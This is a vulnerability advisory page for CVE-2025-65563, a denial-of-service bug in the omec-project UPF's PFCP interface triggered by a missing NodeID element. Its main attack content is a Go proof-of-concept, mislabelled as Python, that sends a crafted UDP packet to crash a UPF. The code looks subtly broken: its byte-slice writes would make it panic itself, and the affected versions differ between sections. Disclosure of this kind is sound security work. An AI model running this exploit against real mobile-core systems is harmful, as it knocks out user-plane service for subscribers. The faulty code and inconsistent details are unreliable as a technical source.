Security Vulnerability Report
中文
CVE-2025-65563 CVSS 7.5 HIGH

CVE-2025-65563

Published: 2025-12-18 19:16:34
Last Modified: 2026-01-07 21:03:19
Source: [email protected]

Description

A denial-of-service vulnerability exists in the omec-project UPF (component upf-epc/pfcpiface) up to at least version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Association Setup Request that is missing the mandatory NodeID Information Element, the association setup handler dereferences a nil pointer instead of validating the message, causing a panic and terminating the UPF process. An attacker who can send PFCP Association Setup Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:opennetworking:upf:*:*:*:*:*:*:*:* - VULNERABLE
omec-project UPF upf-epc-pfcpiface <= 2.1.3-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
package main import ( "bytes" "encoding/binary" "fmt" "net" "time" ) // PFCP Header Structure type PFCPHeader struct { Version uint8 MessageType uint8 Length uint32 Sequence uint32 } // PFCP IE Types const ( IE_NodeID = 0x0001 ) func main() { // Target UPF N4/PFCP endpoint targetIP := "<UPF_IP>" targetPort := "8805" // Connect to PFCP endpoint addr, err := net.ResolveUDPAddr("udp", targetIP+":"+targetPort) if err != nil { fmt.Printf("[-] Failed to resolve address: %v\n", err) return } conn, err := net.DialUDP("udp", nil, addr) if err != nil { fmt.Printf("[-] Failed to connect: %v\n", err) return } defer conn.Close() fmt.Println("[+] Connected to UPF PFCP endpoint") // Build malicious PFCP Association Setup Request without NodeID IE payload := buildMaliciousPFCPMessage() fmt.Printf("[+] Sending malicious PFCP Association Setup Request (%d bytes)\n", len(payload)) // Send the malicious packet _, err = conn.Write(payload) if err != nil { fmt.Printf("[-] Failed to send packet: %v\n", err) return } fmt.Println("[+] Packet sent successfully") fmt.Println("[+] The UPF should crash due to nil pointer dereference") // Wait and check if UPF responds conn.SetReadDeadline(time.Now().Add(5 * time.Second)) buffer := make([]byte, 4096) _, _, err = conn.ReadFromUDP(buffer) if err != nil { fmt.Println("[+] No response received - UPF likely crashed") } } func buildMaliciousPFCPMessage() []byte { var buf bytes.Buffer // PFCP Header: Version=1, MessageType=5 (Association Setup Request) header := []byte{0x20, 0x05, 0x00, 0x00} // Sequence Number: 0x00000001 sequence := []byte{0x00, 0x00, 0x00, 0x01} // Sender's F-SEID (optional, but helps make it look like valid request) fseid := buildFSEIDIE() // OMIT NodeID IE - this triggers the vulnerability // Build IE list without NodeID ieData := fseid // Calculate message length (header + ie data) msgLength := uint32(4 + len(ieData)) // 4 bytes for header extension // Update header with actual length binary.BigEndian.PutUint32(header[1:], msgLength) buf.Write(header) buf.Write(sequence) buf.Write(ieData) return buf.Bytes() } func buildFSEIDIE() []byte { var buf bytes.Buffer // IE Type: F-SEID (57) buf.Write([]byte{0x00, 0x39}) // IE Length (placeholder) ieContent := []byte{ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, // F-SEID value 0x00, // IPv4 indicator 0x00, 0x00, 0x00, 0x01, // IPv4 address } ieLength := uint16(len(ieContent)) binary.BigEndian.PutUint16(buf.Next(2), ieLength) buf.Write(ieContent) return buf.Bytes() }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65563", "sourceIdentifier": "[email protected]", "published": "2025-12-18T19:16:33.850", "lastModified": "2026-01-07T21:03:18.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service vulnerability exists in the omec-project UPF (component upf-epc/pfcpiface) up to at least version upf-epc-pfcpiface:2.1.3-dev. When the UPF receives a PFCP Association Setup Request that is missing the mandatory NodeID Information Element, the association setup handler dereferences a nil pointer instead of validating the message, causing a panic and terminating the UPF process. An attacker who can send PFCP Association Setup Request messages to the UPF's N4/PFCP endpoint can exploit this issue to repeatedly crash the UPF and disrupt user-plane services."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opennetworking:upf:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.1.2", "matchCriteriaId": "C355FD9F-CA5B-4D62-BDA4-991D1443602B"}]}]}], "references": [{"url": "https://github.com/omec-project/upf/issues/955", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/omec-project/upf/pull/963", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/omec-project/upf/issues/955", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.